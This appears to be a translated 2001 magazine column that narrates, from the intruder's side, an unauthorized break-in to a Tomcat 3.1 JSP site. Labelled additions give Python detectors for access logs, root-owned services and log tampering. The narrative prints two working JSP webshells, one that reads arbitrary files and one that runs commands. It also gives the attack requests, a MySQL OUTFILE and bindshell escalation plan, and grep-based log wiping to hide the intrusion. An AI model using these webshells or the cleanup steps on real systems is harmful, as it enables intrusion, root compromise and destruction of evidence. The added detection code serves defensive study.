Editor: "On-site documentary" is a new small column in the hacker attack-and-defense section. Here we introduce real cases of online intrusion. Unlike earlier cases, which were told from the perspective of website security staff, these cases describe the whole intrusion process from the hacker's perspective. Through them you can clearly see the technical means and strategies hackers use when breaking into a website. The column goes into specific technical details because our aim is to improve network security through such technical exchange, not to attack other people's computers maliciously.
"On-site documentary" case submission mailbox: Jiaoxq@staff.ccidnet.com. Please mark the subject line "on-site documentary case", describe the intrusion process and your reasoning in detail in the manuscript, and enjoy generous remuneration.
By chance I came across a website whose pages looked fresh and clean. The site was built with JSP. Out of personal interest, I decided to test its security.
telnet www.target.com 8080
GET /chinansl HTTP/1.1 [Enter] [Enter]
The returned results are as follows:
HTTP/1.0 404 Not Found
Date: Sun, 08 Jul 2001 07:49:13 GMT
Servlet-Engine: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.2.2; Linux 2.2.12 i386; java.vendor=Blackdown Java-Linux Team)
Content-Language: en
Content-Type: text/html
Status: 404
<H1>Error: 404</H1>
<H2>Location: /chinansl</H2>
File Not Found<br>/chinansl
This reveals the web server in use: Tomcat 3.1. I remembered finding a vulnerability in this version and posting it to Bugtraq.
Recall that the "..." trick can be used to escape the web directory, so I tried:
http://target:8080/.../../%00.jsp (NO)
http://target:8080/file/index.jsp (NO)
http://target:8080/index.jsp (NO)
http://target:8080/index.jsp%81 (NO)
http://target:8080/index.js%70 (NO)
http://target:8080/index.jsp%2581 (NO)
http://target:8080/WEB-INF/ (NO)
Security looked fairly good, so I went a step deeper. Tomcat 3.1 ships with an administration tool that lets you view the directories and files under the web root and add contexts. So I tried:
http://target:8080/admin/
The administrator had neither removed this directory nor restricted access to it. From a security standpoint, this is a serious mistake.
Next, clicking the "view all contexts" button listed the names of files and directories under the web root, and a file-upload component soon turned up. I used this component to upload a JSP file to the target's web directory:
<%@ page import="java.io.*" %>
<%
// Read the file named by the "file" request parameter and echo it line by line.
String file = request.getParameter("file");
String str = "";
FileInputStream fs = null;
DataInputStream dis = null;
try {
    fs = new FileInputStream(file);
    dis = new DataInputStream(fs);
    while (true) {
        try {
            str = dis.readLine();
        } catch (Exception e) {}
        if (str == null) break;
        out.print(str + "<br>");
    }
} catch (IOException e) {}
%>
Then I requested:
http://target:8080/upload/test.jsp?file=/etc/passwd
The password file was displayed. The next step, guessing passwords, failed. Still, this is already close to having a shell: if you cannot guess a password, you can use IE as the shell environment for now.
I wrote another JSP file:
<%@ page import="java.io.*" %>
<%
// Run the command given in the "cmd" request parameter and echo its output.
try {
    String cmd = request.getParameter("cmd");
    Process child = Runtime.getRuntime().exec(cmd);
    InputStream in = child.getInputStream();
    int c;
    while ((c = in.read()) != -1) {
        out.print((char) c);
    }
    in.close();
    try {
        child.waitFor();
    } catch (InterruptedException e) {
        e.printStackTrace();
    }
} catch (IOException e) {
    System.err.println(e);
}
%>
After uploading this JSP file through the upload component, I had a shell:
http://target:8080/upload/cmd.jsp?cmd=ls+-la+/ (detailed results not listed here)
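Every step so far (the traversal probes, the request for /admin/, the upload of a JSP into the web root, and the calls to test.jsp and cmd.jsp) leaves a line in the web server's access log. The following detector is an added example, not part of the original article: it runs a few simple rules over access log lines in Common Log Format and flags traversal and null-byte tricks, requests to the admin context or container-internal directories, JSPs served from an upload directory, and webshell-style parameters. The log lines, client addresses and timestamps are constructed to mirror the requests described in the article; the directory name /upload/ and the parameter names cmd and file come from the article itself.

```python
import re
from urllib.parse import unquote, parse_qs

# Constructed sample access log (Common Log Format) modelled on the article's
# requests; the client addresses and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2001:07:49:13 +0000] "GET /chinansl HTTP/1.1" 404 157
10.0.0.5 - - [08/Jul/2001:07:50:02 +0000] "GET /.../../%00.jsp HTTP/1.0" 404 157
10.0.0.5 - - [08/Jul/2001:07:50:40 +0000] "GET /WEB-INF/ HTTP/1.0" 404 157
10.0.0.5 - - [08/Jul/2001:07:52:11 +0000] "GET /admin/ HTTP/1.0" 200 2310
10.0.0.5 - - [08/Jul/2001:07:55:30 +0000] "POST /upload/ HTTP/1.0" 200 512
10.0.0.5 - - [08/Jul/2001:07:56:01 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 1402
10.0.0.5 - - [08/Jul/2001:07:58:44 +0000] "GET /upload/cmd.jsp?cmd=ls+-la+/ HTTP/1.0" 200 3099
10.0.0.9 - - [08/Jul/2001:08:01:00 +0000] "GET /index.jsp HTTP/1.0" 200 4120
"""

# host ident user [time] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+$')

# Paths an ordinary visitor of a JSP site has no reason to request.
SENSITIVE_PREFIXES = ("/admin/", "/WEB-INF/", "/META-INF/")
# Query parameters that the uploaded webshells in the article take input from.
SHELL_PARAMS = ("cmd", "file")


def classify(line):
    """Return (rule, detail, client, status) findings for one access log line."""
    m = LOG_RE.match(line)
    if not m:
        return []                      # not CLF; ignore rather than guess
    client, _ts, _method, target, status = m.groups()
    raw_path, _, raw_query = target.partition("?")
    path = unquote(raw_path)           # %00 becomes a real NUL byte here
    findings = []
    # 1. Directory escape / null-byte tricks of the kind tried against Tomcat 3.1.
    if ".." in path or "\x00" in path:
        findings.append(("traversal", path))
    # 2. The admin context or the container's internal directories.
    if path.startswith(SENSITIVE_PREFIXES):
        findings.append(("sensitive-path", path))
    # 3. A JSP executed out of an upload directory is a likely planted webshell.
    if path.lower().endswith(".jsp") and "/upload/" in path.lower():
        findings.append(("jsp-in-upload-dir", path))
    # 4. Webshell-style parameters carrying absolute paths or shell commands.
    params = parse_qs(raw_query, keep_blank_values=True)
    for name in SHELL_PARAMS:
        for value in params.get(name, []):
            findings.append(("shell-param", f"{name}={value}"))
    return [(rule, detail, client, status) for rule, detail in findings]


def scan(log_text):
    """Run classify() over every line and flatten the findings."""
    return [f for line in log_text.splitlines() for f in classify(line)]


if __name__ == "__main__":
    for rule, detail, client, status in scan(SAMPLE_LOG):
        print(f"{client} {status} {rule}: {detail}")
```

The status column matters when reading the output: the 200 on /admin/ is the article's whole point, since a 404 there would mean the admin tool had been removed. Rule 3 is only as good as the list of directories the upload component writes into, so adapt the prefix to your own deployment.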
How to get root? After some searching I found that MySQL was installed on the system, and I obtained the MySQL password from the JSP source code. I ran:
http://target:8080/upload/cmd.jsp?cmd=ps+aux+|grep+mysqld
It displayed:
root 87494 0.2 1.9 17300 4800 p0- S 28Jun01 .72 /usr/local/data/mysql
The system runs MySQL as root. That gave me an idea: since I know the MySQL password, I could write a shell program, create a table and put my data in it, then use "select ... into OUTFILE" to create a file on the system so that my program runs when the user executes su. (Remember how apache.org was broken into? That was the method the hackers used.)
After that it is relatively simple: upload a program such as a bindshell, run it to get the nobody privilege, and then use the setuid shell created when root runs su to become root.
However, the next step produced a rather surprising result:
http://target:8080/upload/cmd.jsp?cmd=id
It displayed:
uid=0(root) gid=0(xxx) groups=0(xxx),2(xxx),3(xxx),4(xxx),5(xxx),20(xxx),31(xxx)
It turned out this web shell had been root all along! What kind of security configuration did the administrator do?
http://target:8080/upload/cmd.jsp?cmd=ps+aux showed it was running as root (output not listed)
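The root cause of the surprise above is configuration, not a vulnerability: both mysqld and the Tomcat JVM were started as root, so any code they execute (an uploaded JSP included) inherits uid 0. The check below is an added example, not part of the original article. It parses "ps aux" output and reports listed network services that are owned by root; the sample output, process IDs and paths are constructed to match the article's findings, and the set of service names is an assumption to be adapted to your own hosts.

```python
# Constructed "ps aux" sample modelled on the article's finding that both mysqld
# and the Tomcat JVM were running as root; PIDs, paths and times are made up.
SAMPLE_PS = """\
USER       PID %CPU %MEM   VSZ  RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  1120  480 ?        S    Jun28   0:04 init
root     87494  0.2  1.9 17300 4800 ?        S    Jun28   0:12 /usr/local/mysql/bin/mysqld
root     88012  1.1  8.4 92100 21500 ?       S    Jun28   5:31 /usr/local/jdk1.2.2/bin/java org.apache.tomcat.startup.Tomcat
nobody    1201  0.0  0.5  3400 1300 ?        S    Jun28   0:00 /usr/local/apache/bin/httpd
"""

# Network-facing daemons that should run under a dedicated unprivileged account
# (assumed list). A shell obtained through any of them inherits the daemon's
# user, which is why the article's uploaded cmd.jsp answered "uid=0(root)".
NETWORK_SERVICES = {"mysqld", "java", "httpd"}


def parse_ps(text):
    """Parse 'ps aux' output into rows; column 11 onward is the command line."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 10)
        if len(parts) < 11:
            continue                            # malformed or blank line
        rows.append({"user": parts[0], "pid": int(parts[1]), "command": parts[10]})
    return rows


def services_running_as_root(text):
    """Return (pid, executable, command) for each listed service owned by root."""
    hits = []
    for row in parse_ps(text):
        # Executable name only: "/usr/local/mysql/bin/mysqld" -> "mysqld"
        exe = row["command"].split()[0].rsplit("/", 1)[-1]
        if row["user"] == "root" and exe in NETWORK_SERVICES:
            hits.append((row["pid"], exe, row["command"]))
    return hits


if __name__ == "__main__":
    import subprocess
    import sys
    # Pass "--live" to inspect the host this runs on instead of the sample text.
    if "--live" in sys.argv:
        text = subprocess.run(["ps", "aux"], capture_output=True, text=True).stdout
    else:
        text = SAMPLE_PS
    for pid, exe, cmd in services_running_as_root(text):
        print(f"WARNING: {exe} (pid {pid}) is running as root: {cmd}")
```

The fix the check points at is to start Tomcat and MySQL under their own unprivileged accounts; with that in place, the uploaded cmd.jsp in the article would have answered with that account's uid, and the "nobody then escalate" path the author expected would have been the real starting point.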
What remained:
1. Delete my telnet records.
2. Delete the HTTP logs.
To clean the logs I used cat XXX | grep -v "ip" > temp and then overwrote the log files with the filtered copies.
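A log that exists only on the compromised host cannot be trusted once the intruder has a root shell: filtering it with grep -v and copying the result back, as above, leaves a file with no visible damage. The defence is to ship log lines off the host as they are written and to compare the collector's copy with the on-host file. The audit function below is an added example, not part of the original article; both log copies are constructed (the client addresses, times and the filtered-out entries are made up to mirror the article's cleanup), and the comparison is a multiset difference so that legitimately repeated lines are not reported as tampering.

```python
from collections import Counter

# Constructed log copies (hosts and times are made up). SHIPPED is what an
# off-host log collector received line by line as the entries were written;
# LOCAL is the on-host file after someone ran
#     cat access_log | grep -v "10.0.0.5" > temp
# and copied temp back over access_log, as described in the article.
SHIPPED = """\
10.0.0.9 - - [08/Jul/2001:07:45:00 +0000] "GET /index.jsp HTTP/1.0" 200 4120
10.0.0.5 - - [08/Jul/2001:07:52:11 +0000] "GET /admin/ HTTP/1.0" 200 2310
10.0.0.5 - - [08/Jul/2001:07:56:01 +0000] "GET /upload/test.jsp?file=/etc/passwd HTTP/1.0" 200 1402
10.0.0.12 - - [08/Jul/2001:07:57:30 +0000] "GET /news.jsp HTTP/1.0" 200 2200
10.0.0.5 - - [08/Jul/2001:07:58:44 +0000] "GET /upload/cmd.jsp?cmd=id HTTP/1.0" 200 88
10.0.0.9 - - [08/Jul/2001:08:01:00 +0000] "GET /index.jsp HTTP/1.0" 200 4120
"""

LOCAL = """\
10.0.0.9 - - [08/Jul/2001:07:45:00 +0000] "GET /index.jsp HTTP/1.0" 200 4120
10.0.0.12 - - [08/Jul/2001:07:57:30 +0000] "GET /news.jsp HTTP/1.0" 200 2200
10.0.0.9 - - [08/Jul/2001:08:01:00 +0000] "GET /index.jsp HTTP/1.0" 200 4120
"""


def _ordered_difference(source, counts):
    """Lines of `source` that are still outstanding in `counts`, in source order."""
    picked = []
    for line in source:
        if counts[line] > 0:
            picked.append(line)
            counts[line] -= 1
    return picked


def audit_log_copy(shipped_text, local_text):
    """Compare the collector's copy with the on-host file.

    Returns the lines missing from the host (removed), the lines the host has
    that were never shipped (added, e.g. planted decoys), and a per-client
    count of the removed lines, which makes a grep -v "ip" cleanup obvious.
    """
    shipped = shipped_text.splitlines()
    local = local_text.splitlines()
    removed = _ordered_difference(shipped, Counter(shipped) - Counter(local))
    added = _ordered_difference(local, Counter(local) - Counter(shipped))
    removed_by_client = Counter(line.split(" ", 1)[0] for line in removed)
    return {
        "tampered": bool(removed or added),
        "removed": removed,
        "added": added,
        "removed_by_client": dict(removed_by_client),
    }


if __name__ == "__main__":
    report = audit_log_copy(SHIPPED, LOCAL)
    print("tampered:", report["tampered"])
    for client, n in report["removed_by_client"].items():
        print(f"{n} line(s) from {client} are missing on the host")
    for line in report["removed"]:
        print("  removed:", line)
```

The comparison only works if the collector is written to by the server itself (syslog forwarding or an append-only remote sink) rather than by a periodic copy from the host, since a copy taken after the cleanup would simply reproduce the filtered file.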
Note that I did not alter the website's pages, because I am just a network security enthusiast. So I sent an email to the system administrator! Of course, as I mentioned in the letter, we would be very pleased to provide security services to him if needed.